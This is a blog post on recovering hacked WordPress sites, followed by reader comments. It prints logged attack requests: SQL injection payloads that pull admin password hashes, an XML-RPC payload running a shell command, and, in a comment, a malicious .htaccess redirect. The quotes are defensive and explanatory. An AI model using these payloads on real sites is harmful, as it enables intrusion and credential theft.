Did your WordPress site get hacked?

Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs. You did upgrade didn’t you? No? It was inevitable that you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time.

Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log them in again at a later date.
That’s how even diligently upgraded blogs were hacked. The bad guys got there before you.

In the last week the hackers have started again. There is no zero day WordPress exploit. There is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They’re using the old exploits all over again. This time they’re redirecting hits from Google to your blog. Those hits are instead being redirected to your-needs.info and anyresult.net

If you’ve been hacked

  1. Upgrade to the latest version of WordPress.
  2. Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
  3. Change your passwords after upgrading and make sure the hacker didn’t create another user.
  4. Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?
    define(‘SECRET_KEY’, ’1234567890′ );

Hidden Code

The bad guys are using a number of ways to hide their hacks:

  • The simplest way is hiding their code in your php scripts. If your blog directory and files are writable by the webserver then a hacker has free reign to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won’t be overwritten so make sure you double check those files for any strange code that uses the eval() command, or base64_decode(). Here’s a code snippet taken from here:
    < ?php

    Another hack adds different code to your php files. Look for k1b0rg or keymachine.de in your php scripts and remove that offending code if you find it.

  • Check your .htaccess file in the root of you blog. If you've never edited it, it'll should look like this:
    # BEGIN WordPress
    <ifmodule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </ifmodule>
    # END WordPress

    That file may have this chunk of code too which is to do with the uploader:

    <ifmodule mod_security.c>
    <files async-upload.php>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </files>
    </ifmodule>

  • They're also uploading PHP code disguised as jpeg files to your upload directory and adding those files to the activated plugins list. This makes it harder to find them, but not impossible:
    1. Open PHPMyAdmin and go to your blog's options table and find the active_plugins record.
    2. Edit that record. It's a long line. Scroll through it and you'll find an entry that looks like ../uploads/2008/05/04/jhjyahjhnjnva.jpg. Remove that text, and make sure you remove the serialized array information for that array record. If that's beyond you, just delete the active_plugins record and reactivate all your plugins again.
    3. Check your uploads directory for that jpg file and delete it.
    4. This Youtube video shows how to do that. I don't think there's any urgent need to remove the rss_* database record but it won't hurt to do it.

Change Your Passwords

Once you've upgraded and verified that your install is clean again you must do the following:

  1. Change the passwords of all users on your system.
  2. Make sure the hacker hasn't added another user account he can use to login again.

Stop the bad guys

One way of stopping the bad guys before they've done any major damage is by doing regular backups and installing an intrusion detection system (IDS).

  • I use Backuppc to backup all my servers every night, and a simple MySQL backup script to dump the database daily.
  • The first IDS that springs to mind is Tripwire but there are many others. I just installed AIDE to track changes on this server. What it does is give me a daily report on files that have changed in that period. If a hacker has changed a script or uploaded malicious code I'll get an email within a day about it. It does take some fine tuning, but it's easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo..):

    # apt-get install aide
    # vi /etc/aide/aide.conf.d/88_aide_web
    # /usr/sbin/aideinit

    In the configuration file above I put the following:

    /home/web/ Checksums
    !/home/www/logs/.*
    !/home/web/public_html/wp-content/cache/.*
    !/home/web/.*/htdocs/wp-content/cache/.*

    That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.

Please Upgrade

There is absolutely no reason not to upgrade. WordPress is famous for it's 5 minute install, but it takes time and effort to maintain it. If you don't want the hassle of upgrading, or don't know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn't an advert for WordPress.com, go with any blogging system you like, but don't make life easy for the scum out there who'll take over your out of date software and use it to their advantage.

Help a friend

Check the source code of the blogs you read. The version number in the header will quickly tell you if their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:

<meta name="generator" content="WordPress 2.5.1" /> <!-- leave this for stats -->

What does a hack look like?

I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that's not installed. The bots are so dumb they'll even come back again and again performing the same attacks.

Here's what I call the "ekibastos attack". It happens over a number of requests and I've seen it come from 87.118.100.81 on a regular basis. It uses a user agent called, "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)" which strangely enough doesn't show up on Google at all right now.

  1. First the attacker visits your Dashboard, and then without even checking if that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
  2. Then he POSTs to wp-admin/admin-ajax.php with the following POST body:
    POST: Array
    (
    [cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
    )

  3. When that fails, he grabs xmlrpc.php.
  4. He then POSTs to that script, exploiting an old and long fixed bug. Here's a snippet of the data.
    HTTP_RAW_POST_DATA: <?xml version="1.0"?>

    <methodCall>

    <methodName>system.multicall</methodName>

    <params>

    <param><value><array><data>

    <value><struct>

    <member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>

    <member><name>params</name><value><array><data>

    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

    </data></array></value></member></blockquote>

  5. That fails too so the query is repeated with similar SQL.
    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

  6. Then he tries a trackback:
    URL: /wp-trackback.php?tb_id=1
    POST: Array
    (
    [title] => 1
    [url] => 1
    [blog_name] => 1
    [tb_id] => 666666\'
    [1740009377] => 1
    [496546471] => 1
    )

  7. And another trackback:
    URL: /wp-trackback.php?p=1
    POST: Array
    (
    [url] => ekibastos
    [title] => ekibastos
    [excerpt] => ekibastos
    [blog_name] => +AFw-\')/*
    [charset] => UTF-7
    )

  8. Before finally going back to xmlrpc.php with this POST request:
    <?xml version="1.0"?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>k1b0rg' icq: 76-86-20</string></value></param>
    <param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
    <param><value><string>admin</string></value></param>
    </params>
    </methodCall>

  9. In between, he also tries the following GET requests:
    GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
    GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1

  10. Thankfully I upgraded and all those attacks fail.

Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn't convince you that you must upgrade and check your website, I don't know what will.

PS. For completeness, here's another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.

<?xml version="1.0"?>

<methodCall>

<methodName>test.method

</methodName>

<params>

<param>

<value><name>','')); echo

'______BEGIN______';

passthru('id');

echo

'_____FIM_____';

exit;/*</name></value>

</param>

</params>

</methodCall>

Edit: Tripwire url fixed, thanks Callum

PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.


You might also like

If you like this post then please subscribe to my full RSS feed. You can also click here to subscribe by email. There are also my fabulous photos to explore too!

"Did your WordPress site get hacked?", 4 out of 5 based on 15 ratings.

384 thoughts on “Did your WordPress site get hacked?


  1. What an excellent and well written post.

    I’ve been vulnerable and paid the price in the past. Thanks to articles such as this one I hope I’m a bit better protected these days.

    But they are clever bastards and trying to keep ahead of them is hard sometimes. I wonder just how many people don’t have the time (or indeed the knowledge) to find out how to protect themselves properly.

    It’d be great if WordPress could publish info such as this right on the front page, so that it’s brought to peoples attention more easily.

    Anyway, as I say, great post. Thanks for spending the time putting it out there for the rest of us.


  2. Umm… WordPress 2.5.0 and 2.5.1 appear to vulnerable to this attack. I’ve personally helped a couple of people that were taken down by this hack (the one that redirects to anyresults.net).

    Here is an example of someone dealing with it on 2.5.x:

    http://www.getrichslowly.org/blog/2008/06/08/patching-the-wordpress-anyresultsnet-hack/

    I’ve done some digging, and it appears to be pretty widespread. Lots of sites that I frequent are affected.

    The only other possibility that I can think of is that DreamHost has been compromised (I think many of these sites are on DH — could it be that they’ve gotten in and are attacking these installs from the inside?).


  3. Great post. What about WP Security Scan Plugin? Is it ok to use, in order to see your WP security gaps?


  4. Thanks for the heads up on keymachine.de I keep seeing that one on a regular basis and have been tempted to just ban the whole domain, now I will!


  5. Good post, but as far as I remember, there is also a way to hide code only in the database, so it would take some time to detect and find it.


  6. Great post, Donncha. Thanks for clarifying exactly how these hacks work and underlining the importance of upgrading to the latest versions as soon as they’re available!


  7. Thanks for the warning, someone contacted me regarding this issue of Google link redirecting and I thought it was an anomaly and asked them to check again. The second time she checked, the link directed to the correct page. Does that mean the hacked code somehow got overwritten? Or does the link redirection happens once in every “x” clicks or something to that order? The WP version is 2.5.1. Any input will be highly appreciated!


  8. fivecentnickel.com – I think there’s a good chance they were compromised before they upgraded. So many sites were hijacked the previous time the hackers activated their payload that there was bound to be a second wave.

    It’s probably worth double checking even if your site doesn’t exhibit any of the redirect problems. I know I grepped all my installs just in case.


  9. Very good tips, a hack could be hard to be found but my guess you should always validate your feed.

    feedvalidator.org is a good tool you can you to take a look of what is being published and search for strange links, domains, etc..


  10. My blog got hacked. It makes me mad that the hackers can’t find a way to do something good with their skills rather than picking on innocent people.

    Thanks for a great post. I learned a lot!


  11. “That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.”

    and thats exactly why cache should be outside of webroot, and almost everything else as well (plugins etc.) because guess where the next backdoor script is going to be placed..

    I host 9-10 wp blogs on a server, all running current. they have been hacked with 0day exploits 3 times in 6 months now. one of the blogs had so many pharma pages added to it that it was bringing the whole server to a crawl from the traffic.


  12. Here’s another tip: aside from checking file/directory permissions, make sure you don’t have obsolete JS directories/libraries lingering about. Much to my consternation I realized some “mysterious” pages were uploaded with an exploit of a JavaScript WYSIWYG (TinyMCE) editor. In my case, I did a full WP install refresh (just clearing out almost everything and uploaded a new set) as well as combing through all directories to find any suspect “additions” and that was the end of it.


  13. What’s the deal with the 2.3 and 2.5 branches of WordPress being plagued with security vulnerabilities??!! The older, (better, imo) WordPress 2.2.3 is not affected by any of the vulnerabilities discovered once these new versions were released.

    I believe this question deserves an answer from the WordPress developers. It’s as if security was completely thrown out the window with the release of 2.3.


  14. you are right xmlrpc.php exploit can be done easily with previous versions of wordpress, my blog was also atacked many times…
    However the latest upgrade resolve the issues, just a tip for other users make sure that you block IP’s through which attacks and spammers are coming that will really help you.
    Regards,
    Himanshu


  15. I was hacked a few months ago…unfortunately for the hacker, i hadn’t started working on my site yet (still haven’t actually :P). Thankfully it was nothing more than a kiddie playing with his computer. 10 minutes on my FTP and my site was back to normal. I made sure to delete EVERY file that had been uploaded and/or modified the day the hack happened. That made cleanup REALLY easy if anyone ever has this happen to them. I even too a screenshot of my site hacked :D

    http://img241.imageshack.us/img241/5268/fuckxa9.png


  16. wow, thanks buddy, these tips really helped me a lot, i will now upgrade to latest version when ever its out :) currently, Im on latest version, but I didnt upgrade for a long time until I noticed some bugs in older version..
    Thanks again


  17. Serves me right for running an out of date WordPress I guess. Exact same attack, exact same IP address … 87.118.100.81 … I have informed abuse@keyweb.de. I wish I’d read this yesterday, though! Off to restore from backup …


  18. Thank you so much this post. I upgranded to 2.5.1 the day it came out, but I’ve seen the attempts in WussUp and was not familiar with what they were trying to do, other than a vague suspicion it was probably malicious.

    I’ve heard from several other WP bloggers who’ve been hacked, and I will definitely be forwarding this post to them.

    Thanks again!


  19. Thank you SO MUCH for this article. I’ve definitely seen weird re-directs but I don’t know when they started since I rarely check my stats. Sigh. I don’t see any changed files and keep my server permissions rather tight (755 on directories and 644 on files) but something is wrong.

    At least with your article I have a starting point. I’m running 2.1.3 and got complacent….


  20. It only takes one time to learn. I got hacked two weeks ago before I upgraded and installed the security plugin. I haven’t had a problem since… just make sure ou leave the scanner activated, and keep a lookout for WP upgrades. Doesn’t 2.6 come out soon?


  21. Don’t forget to check the database for cruft left by the attacker if they do get in.

    During the April attacks, I had cleaned up the files that had been compromised, but they still got back in a week or so later because some of the options had been tampered with, and a WordPress upgrade to 2.5 didn’t fix it.

    Actually viewing the tables was the only way to see the hidden user they’d created… there was no way to see it from inside the WP admin panels.


  22. I can’t find any files which have changed, and I’m hoping this is due to the permissions I have set, so I can only assume they made some database additions. I have no idea how to check that out but I’m off to see what I can find.


  23. Ok, I’ve upgraded to 2.5.1. Thank you SO MUCH for this article. When I ran upgrade.php WP upgraded the database also. (shrug) I did find 2 users I didn’t know anything about and just deleted all my users, even my own id, leaving only admin and then changed the password.

    i hope that is enough and i don’t have to go into the database (scary).


  24. One thing I do is delete xmlrpc.php. I don’t have any reason to post to my blog through it, and it’s been so bad for security, that I just blow it out. Another thing I do is cat /dev/null > wp-trackback.php which makes it an empty file with no functionality. I hate trackbacks… they drive me nuts, and it seems they too have been responsible for badness. From those two things, I’ve been able to weather these security lapses via the common methods. I got smacked by a bug via an email plugin that allowed spammers to inject email into it, but that’s another story.


  25. I got hacked. I sadly admit that I don’t know when it happened, but I caught it when I was going through referrals as listed in my SiteMeter account and I found that my site had taken a couple of google referrals for some drug.

    Since I’d never posted about that drug, I thought it possible that it was comment spam, although Akismet (and Spam Karma before that) had done well in stopping comment spam.

    It led me to a post on my blog. I did a “view source” in FireFox and concluded that there was code added to my “footer.php” file. I opened the file in the admin suite and cut the offending code.

    How does this stuff get in?


  26. I got hit and some of my hosting customers as well.
    Thanks for showing the query they try from the url to access wp_users table. That’s why I think one of the most important steps is to change your table prefix to something other than wp_, to make it impossible to find out.
    Also, stay away from fantastico installations, they are insecure.
    Regards.


  27. Ok, I upgraded, installed security plugins and still am having the referral problems. No files on my server were changed. After the upgrade they would have been gone anyway. So I downloaded and uploaded and activated a new theme – still wacky referrals, so it must be my database. I’m now renaming all the tables from wp_ to something else. Sigh.

    Any ideas where to find the database crud?


  28. Kathy, have you tried your theme folders? I had a .jpg image there called single_old.jpg which was the rogue file.


  29. @kathy,

    The database crud I found was in wp_users and wp_options.

    I posted details about what I found in the WP forums back in April/May when it happened the first time.

    The post with what to look for is http://wordpress.org/support/topic/168964#post-740607

    The other thread with info to look for is http://wordpress.org/support/topic/141041

    Basically, look for any entry in one of your options fields that has a strange looking file path with lots of dotdotslashes in it.


  30. Is 2.3.3 okay?

    The reason why I don’t upgrade is because the true blue theme for K2 hasn’t updated. I love that theme! :P


  31. @Summer – looking at the database itself, I have no weird active plugins and checking the options table I have no weird theme stuff. Looking at the database (from phpadmin) I see only one user and it isn’t admin as I changed that userid yesterday. I am still getting weird referrals so there is something somewhere in something. i’m going to check the jpg’s again – maybe an old theme or a non-active theme? Maybe I’ll just wipe the content directory and start from scratch…


  32. Maybe it would be a great idea to have a plugin that can check for these vulnerabilities ? Something that can check against these routines ?

    My knowledge of WP plugins is limited, but feel free to use the idea !

    Paul – BloggingSupport.


  33. @kathy,

    I discovered yesterday that the same 2 IP addresses were bombarding a server of mine, trying to access wp-comments-post.php for a handful of websites using fake referrers from those same websites.

    I knew they were fake because I’d moved those 15-20 domains off that one server and onto another one to prep the old one for a rebuild. The referrers were fake because there was no activity on the real sites matching those hits, and no way the real sites would have referred over to the old server for those calls.

    Maybe what you’re seeing and what I was seeing yesterday was just an attack of comment spams? I’m just wondering if they chose the old IP of those domains, and had it hard-coded into their script because the sites had been previously hacked a few months ago. But yes, I went through the themes again just to be sure, and I didn’t find anything this time.

    The increase in attacks is both annoying and disturbing.


  34. thanks for this article. I unfortunately have suffered from the spam link hack. And like your article discussed, upgrading after the fact is too late. It got me bumped off google for awhile. Thought I had licked it and that is when I discovered that there were still problems.
    Guess I have to dedicate a saturday to following all the advice in this article!


  35. Confirmed: TinyMCE gets hammered on my place, which is running WP 2.5.1. My simple solution: I’ve taken down the whole /wp-includes/js/tinymce/ directory and everything underneath – problem cleanly solved.

    No more issues with that @#$% editor messing up my tags, either: pure win-win.


  36. Thanks for the very informative post…
    Some of the best practices that I follow in order to keep my blog safe (although it’s not really very unsafe, not being very popular) are that I change my password regularly, every month. Passwords I use are very strong have combination of upper and lower case, special characters and numbers.
    I update my blog regularly, with the help of the automatic wordpress update plugin, it really is a matter of a few clicks so I recommend that to everyone.


  37. I recently upgraded my website but before I saw some of the codes posted here. It seems I need to root whatever evil is hiding now inside my blog.

    Thanks for this very informative article.


  38. Wow! Thanks, I wasn’t even aware of the security flaw… I upgraded when 2.5.1 came out, but didn’t realize that it was so potentially threatening. I plan on checking all of my sites to make sure they’re not vulnerable!


  39. Donncha,

    Do you know of any plugins that take a checksum of your particular wordpress install, then notify you if any of your files change.

    Same idea as the Intrusion Detection System you mention, but maybe easier for most users?

    Paul


  40. Paul – there’s this file change plugin that would be useful if you don’t want to run AIDE or Tripwire.

    I wouldn’t run it as often as an hour because the find command could be intensive if your site has lots of files.

    It also won’t find files that have been modified but had the modification time reset by “touch”.

    I’m not aware of a php script that records checksums. That’d be useful, except that hackers could manipulate the data easily.


  41. Thank you! Thank you! Thank you!!!

    I had 2 days of redirects after I made each change in your article (the table prefix was hardest) but it has paid off. By the time I did the very last thing – the table prefix I was finding my site in the google searches anymore.

    It was a LOT of work (since I am clueless when it comes to this stuff) but I got it done. There are two other sites mentioned in the comments – the 9 things and the 10 things lists and those are very helpful also. I also installed a security plugin http://semperfiwebdesign.com/plugins/wp-security-scan/ and a login lockdown plugin http://www.bad-neighborhood.com/(let me look for the links) but couldn’t get the password plugin to work. Fatal errors. (ask apache password protect)


  42. Well luckily for me my blog is new so I haven’t experienced that yet but this is good information to know for the future.


  43. Donncha, Thanks for the write-up but one of the harder parts to fix is the indexing down by Google if your site is compromised. I got nicked by a WordPress flaw and now I spend my time getting things corrected with Google and Yahoo.

    Cheers


  44. Mario, if you have a sitemap and communicate it to Google and Yahoo regularly and properly (there are several plugins that can do that for you, both from a SEO point of view and as a “pure” sitemap generator) the poisoned links should be flushed out within a week or so. Also, I’ve found that the Google, Yahoo and (Windows) Live teams involved in indexing are helpful, when you’re really stuck in the aftermath of a hack attack aimed at poisoning your site with (malicious) links.

    Also, if you have an account with Google, sitemap management with them is a breeze:
    http://google.com/webmasters

    As to Yahoo, you can keep track of your indexed pages with their Site Explorer:
    https://siteexplorer.search.yahoo.com/

    I wholeheartedly recommend Arne Brachhold’s XML Sitemaps plugin, which makes index tracking and management a lot easier: something which is essential in the last step after a (sadly) successful hack attack – the clean-up of the mess.

    Good luck.


  45. Álvaro: Thanks for the reply. My solution was to write my own CMS platform from scratch and delete WordPress and any PHP.

    I do have a python script that dynamically walks the structure of my site and returns a valid sitemap.xml document for Yahoo/Google to parse.

    The sitemaps were submitted 2 weeks ago and have been touched by Googlebot twice in that time.

    The issue is other infected sites that have thousands of links pointing back to me referencing adult or pharmaceutical content that I have since removed. From Google’s Webmaster Dashboard, the “What Googlebot sees” section continues to view my site as adult oriented.


  46. It’s an arms race, and I always feel like I’m playing catch up.

    How reliable is protecting your wp-admin folder with an .htaccess file to limit it to your home IP address.

    If they’re not on my whitelist of IP addresses, is there a way around to access wp-admin?

    Thanks for all of your help


  47. I’m getting an awful lot of hits from bots looking for the following:
    /wp-includes/js/thickbox/\”+urlNoQuery[0]+\”

    Anyone else getting that too? No idea what vulnerability they’re probing, but it just doesn’t feel right, looking at the numbers of requests I’m getting for that resource.


  48. Thanks for the article, I had 5 of my blogs hacked in various ways. All upgraded and repaired now, it was a shock to see how quickly they got it though.


  49. just stumbled across your page. i run this theme too and i can’t stand it haha. You seem to be managing better than me here :)


  50. Excellent advice man, followed it after being referred to this post by Conor from Louder Voice..


  51. That’s why it’s always important to upgrade to the latest version of WordPress when it’s available.

    It can be a hassle, I must admit, but it’s worth it!


  52. Thanks for the extensive explanation, one of my blogs got hacked a ouple of weeks ago. Some encoded javascript code was injected to the wp-blog-header.php file. It took me a while to figure out.

  53. Pingback: Osteospermum
  54. Pingback: WordPress PSA

  55. Another easy thing to do is regularly FTP sync from your computer to your host. Set up the FTP software to replace files with whatever is on your computer and to delete everything else. Once a script is setup, all it takes is a click to replace/wipe infected files.

  56. Pingback: Site Upgrade

  57. There is something more over here http://www.bloggerguide.net/blog-platform/wordpress/wordpress-exploit-giving-backlinks-redirects-and-headaches-but-no-visitors/

    If you got attacked, you sure have an user added, called WordPress, visible if you disable javascript in the browser, or visible in the database, with no nicename, created at 00:00:00 0000-00-00.

    In wp_options table, active_plugins you also have the links_cache where are stored the spam links that show up for Googlebot, but not to you.

    Check on http://www.web-sniffer.net on http://www.denisuca.com.
    Googlebot sees: http://web-sniffer.net/?url=http%3A%2F%2Fdenisuca.com%2F&submit=Submit&http=1.1&gzip=yes&type=GET&uak=7

    On Internet Explorer 7 or else you will see: http://web-sniffer.net/?url=http%3A%2F%2Fdenisuca.com%2F&submit=Submit&http=1.1&gzip=yes&type=GET&uak=2

    Googlebot sees the spam links hidden in links_cache.

    The problem is more complex, but it shoud be stopped.

    There are more locations for there .jpg,.jpgg,.jpeg files. Found some 4 subfolders below in wp-includes tinyMCE.

    And another thing… Attacks were also possible in the latest WordPress stable version.

  58. Pingback: Wordpress hacking

  59. Thanks for this post. I read this about a month ago and wanted to upgrade but my webhost only had the older version available. Too bad cuz now I have been hacked. =(


  60. I have (had) Yahoo for the hosting on my site that got hacked, and they don’t offer anything above WP 2.5 (I should have upgraded via ftp, though).

    Sadly, when my site went down last week, Yahoo refused to put it back up because they said it messed up their server farm. I went and looked at the files and sure enough, somehow the hackers got tons of spammy credit card links into my hear – what a nightmare! It’s already cost me over $1000 in losses – too bad we can’t find these jerks and sue them.

    So now I’m in the process of transferring the domain and moving to a different host.


  61. Phew. When I get hold of the slimeball who screwed (more than 10 of) my blogs I will claim diminished responsibility due to rage at being violated. These scumbags cannot be found but if they se my email address then I get my site hosting revoked with no reasons given and no refund. I like justice – shame their ain’t any.

    Thanks for the info – I am hardening as we speak.


  62. Hi
    my site has been hacked
    I found your site using google
    however, i follow your instructions but i am not able to find what you mention in the database
    is it a new hack or what?
    please help
    thanks


  63. Really? wow i didnt know they can hack wordpress that easily and quick. Well im already updated to the latest version. Ill see from time to time on the htaccess file incase it was hacked. thanks for letting us know though.


  64. Hi, this post is simply beyond great. You should write a book on it. One of our sites were hacked,http://www.hornerartworkshop.com we did a noscript search, found a bugger and deleted. We also went to Google Webmaster tools for resubmission. After several weeks still shows on listing in the search that says site is dangerous and Firefox tells you to RUN!
    Any suggestions?


  65. I’ve been experiencing period hack attempts by the same methods used in what you call the “ekibastos attack”, the latest one being this AM. I’ve kept my WordPress installs upgraded to the latest version available, so whoever this is hasn’t been able to get in, thank goodness.

    I also did a few things to lock down my WP install a bit more, as well as downloading and running the WordPress Exploit Scanner this evening – everything came back clean after the scan. Thanks for writing that plugin!


  66. Thanks for these hack notes! Here’s one I found…

    A few days ago, I was working on one of my blogs, and I happen to notice that the .htaccess file was larger than I remembered. I am talking about file size here . Yeah, I know. It’s not the kind of thing most people notice, but I kinda have a thing for numbers. And yes , I am a geek.

    Anyway… I notice the file size and start thinking, it shouldn’t be that large. So, I download it from my domain to take a peek. Sure enough, some scum bag (bleep) piece of (bleep) hacker type has uploaded a new .htaccess file. It’s purpose? To fake people out and sell anti-virus software. That’s it.

    The .htaccess file’s real purpose is to help WordPress display *pretty links* as the URL. It takes the title of the post and adds dashes and uses that as the URL. Great for Google Link Love ! I put a sample of what that looks like for a typical WordPress blog below. You might want to compare yours…

    # BEGIN WordPress
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    # END WordPress

    The modified .htaccess file basically says… if someone is *referred* from Google (or AOL, or Yahoo, etc), then display a little window that says they are being attacked, and then redirect them to the site where they can buy some protection. Piece of (bleep). The sad part is that this technique works on a lot of people. And they used MY site to do it!

    Can you guess what that does to my reputation for first time visitors?

    Here’s the additional code the piece of (bleep) added to my .htaccess file. Again, you might want to review yours and make sure it doesn’t include this.

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

    Gotta Respect Google

    The downside to having a popular blog? Google comes by often. This would be a good thing, normally . Except for one little thing. Google came by while the bogus .htaccess file was there! Net result? Google thought I was a malware site and setup a redirect page that basically said I was attacking my visitors. Yeah. Cool, huh?

    But, you have to respect a service like Google that is simply focused on making the surfing experience a better one for their visitors. They included a note to the webmaster on the nasty-gram-page on what to do to clean your site. Google even offered a *review* process to make sure all the fixes took.

    I requested a review at 11am this morning, and by 11pm, my site was back online. Kudo’s Google on having your process down pat and helping *the-little-guy* get back up and running so quickly.

    So, do yourself a favor all you self-hosted bloggers out there … go check your .htaccess file. Make sure it only contains what you expect it to contain. And while you are there, update the permissions to remove the *write* feature. I did.


  67. Hi. These three strings I think were typed into the search box on our blog yesterday morning. The search box is on any of our public pages, though I suppose anyone familiar with wordpress can find it? When checking the plug in Spy, we saw these three things: Can you tell us what they are? Any help would be greatly appreciated.

    ‘)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,0x3a,user_login,0x3a,user_pass,0x3a,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users#

    ?s=�%27%29%29%29%2F**%2FAND%2F**%2FID%3D-1%2F**%2FUNION%2F**%2FSELECT%2F**%2F1%2C2%2C0x3a%2Cuser_login%2C0x3a%2Cuser_pass%2C0x3a%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2F**%2FFROM%2F**%2Fwp_users%23

    eed=rss2&p=11/**/union/**/select/**/concat(0x3a,user_login,0x3a,user_pass,0x3a),2/**/from/**/wp_users/**/where/**/user_id=1/*
    January 11, 2009


  68. Greg – check your theme properly escape search strings. Make sure it doesn’t print $s directly, it should use the_search_query()
    Oh, and change the passwords on all your users, just in case.


  69. Hi Doncha. I do not know what I am doing. Can you tell me which file to look in for the code you are talking about? Greatly appreciated. Thanks Greg


  70. Thanks. I checked the server version of the index.php file in the default themes folder, and it has not been modified since two weeks ago, so that should rule it out. I uploaded the one from my local machine to write over it just to be sure. I also reviewed all the modification dates of every non database file on the remote server, and nothing was modified since the search string hack attempt I posted. If you can think of anything else, please let me know. And in any event, thanks for the fast reply and the help. Greg


  71. I just wanted to add that in many cases its good to have a second layer of protection that includes the protection of the plugins etc.
    I strongly recommend phpids for this, its a software for php 5.2.x that protects scripts against almost all sql injections and xss attacks;)
    Regards,
    Malicious


  72. Thanks for the great content! I had to go through my entire database, post by post to find the hidden iframes code the hacker left behind!

    Hopefully now I have resolved the problem. Thanks again.


  73. I am a perfect n00b and my group pf blogs were hacked. I was using on them all WordPress 2.7 and I had long passwords like: Uh5″ôD$id?!MS) but It was hacked yesterday and I am still trying to make them work. My hosting company midphase.com helped me to get one of ‘em online and running but the others remain hacked: miautoculiacan.com the content is there and I can enter the admin panel with my password and I am just trying to understand everything. My .htaccess reads like this:
    # -FrontPage-

    IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*

    order deny,allow
    deny from all
    allow from all

    order deny,allow
    deny from all

    AuthName http://www.internetpymes.com
    AuthUserFile /home/intebas7/public_html/_vti_pvt/service.pwd
    AuthGroupFile /home/intebas7/public_html/_vti_pvt/service.grp
    # BEGIN WordPress

    # END WordPress

    Where do I keep looking? Am I in the right direction?

  74. Pingback: Securing Wordpress

  75. Yes, my custom hosted wordpress blog was hacked back in 2007. Talk about heartbreak – I got my first writing job based on that blog!

    I’m tentatively back on the wordpress train but only on wordpress.com which points to my own domain name.


  76. Recently started up a blog and was happy when I started getting listed on google and seeing referrals coming there. Then as quickly as the search results came they disappeared. I noticed googlebot indexing my site last night. Are these fluctuations normal on a new website? I have checked my site for the problems you mention here and it appears to be clean with the latest version of wordpress installed. Thanks for the information and great blog by the way!


  77. Hi, i created a sub folder in my server to test wordpress. it was just 10 days and then some files in that folders are deleted except wp_content folder, wp_includes folder and and wp_register.php… also some of the other folders and files are deleted in the root folder. will word press hack deletes files other than the wordpress files??? also the files are read write mode. so :-(


  78. Some great information here, many thanks to all.

    I do try to keep up with the latest versions on all my sites, including plugins, but have to admit that i’m sometimes a bit irregular with my backups.

    Luckily, everytime i’ve been hacked (about 30 times across 40 sites in the last 12 months), no damage has been done.

    Thanks again for the tips.


  79. Darn,

    I’ve been hacked with 2.6.5 last year, and just recently with 2.7 on a couple of my sites. It’s extremely annoying, as those were ones on shared shoting packages that don’t let me upgrade automatically. It’s pure laziness on my part that I didn’t do it, all my other sites are 2.7.1 and don’t have a problem.

    Note to self: UPGRADE

